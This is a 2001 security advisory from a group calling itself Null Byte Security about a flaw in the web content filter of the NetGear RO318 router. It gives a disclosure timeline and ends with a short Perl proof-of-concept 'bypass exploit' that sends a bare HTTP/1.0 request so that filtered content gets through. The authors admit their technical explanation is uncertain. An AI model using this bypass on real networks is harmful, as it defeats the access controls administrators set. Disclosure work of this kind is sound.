netgear.txt

`=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ NetGear RO318 HTTP Filter Advisory =+  
=+ Null Byte Security =+  
=+ http://home.tampabay.rr.com/nbs/ =+  
=+ don't call it a come back =+  
=+ [email protected] =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ Contents Table =+  
=+ =+  
=+ 1.About =+  
=+ 2.Affected =+  
=+ 3.Details =+  
=+ 4.Contact =+  
=+ 5.Conclusion =+  
=+ 6.Thanks =+  
=+ 7.Greets =+  
=+ 8.POC =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 1.About =+  
=+ =+  
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+  
=+ fully protects your small office network against intrusion. Equipped with =+  
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+  
=+ Network Address Translation (NAT) to maintain network security against =+  
=+ hackers, it ensures prolonged up time and maximized productivity for your =+  
=+ network. Web content filtering options let network administrators establish =+  
=+ restricted access policies - based on the time of day, day of week, Web =+  
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+  
=+ hacker attempts and browsing activities. Web-based installation instructions =+  
=+ make setup easy. Your network up and running, and sharing high-speed Internet =+  
=+ access with up to 253 users, in less than an hour. =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 2.Affected =+  
=+ =+  
=+ NetGear RO318 Cable/DSL Security Router =+  
=+ =+  
=+ Although the NetGear RO318 is the only router listed here we are sure there =+  
=+ other routers that use the RO318's web filtering technology. =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 3.Details =+  
=+ =+  
=+ We are not too sure of the details ourselves because of time restraints, but =+  
=+ we do have an idea. One, the web filtering component in the firmware only =+  
=+ checks for fully constructed requests and thus sending a malformed, somewhat, =+  
=+ request results in the retrieval of restricted content. =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 4.Contact =+  
=+ =+  
=+ December 2 2001: Contacted NetGear =+  
=+ December 2 2001: Contacted online support =+  
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+  
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+  
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+  
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+  
=+ December 8 2001: Five working days passed =+  
=+ December 20 2001: Eighteen days passed =+  
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+  
=+ December 26 2001: POC released =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 5.Conclusion =+  
=+ =+  
=+ This is definitely a security vulnerability and not a feature. We hope Net =+  
=+ Gear will fix this with their next firmware release so administrators can =+  
=+ restrict necessary web-content without having to worry about this bug. =+  
=+ =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 6.Thanks =+  
=+ =+  
=+ Bi0cide for the help =+  
=+ Datagram for the help =+  
=+ Natas for the help =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 7.Greets =+  
=+ =+  
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+  
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+  
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+  
=+ Security Focus, and everyone else. =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ 8.POC =+  
=+ =+  
#!/usr/bin/perl  
#don't call it a come back  
#[email protected]  
  
use IO::Socket;  
use Getopt::Std;  
  
getopts('h:p:z', \%argv);  
  
if(!defined($argv{h}))  
{  
print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n";  
  
print"Usage: $0 -h <host> -p <port> \n";  
exit;  
}  
  
if(defined($argv{h}))  
{  
&begin  
}  
  
sub begin  
{  
$html = html;  
$host = $argv{h};  
if(defined $argv{p})  
{  
$port=$argv{p};  
}  
else  
{  
$port = "80";  
}  
  
$socket = IO::Socket::INET->new (Proto => "tcp",  
PeerAddr => $host,  
PeerPort => "$port")  
or die "Connection Refused.\n";  
  
print $socket "GET / HTTP/1.0\n\n";  
while (<$socket>)  
{  
open(LOG, ">>$html");  
print (LOG);  
}  
close $socket;  
}  
=+ =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
=+ http://www.wiretrip.net/rfp/policy.html =+  
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+  
  
  
`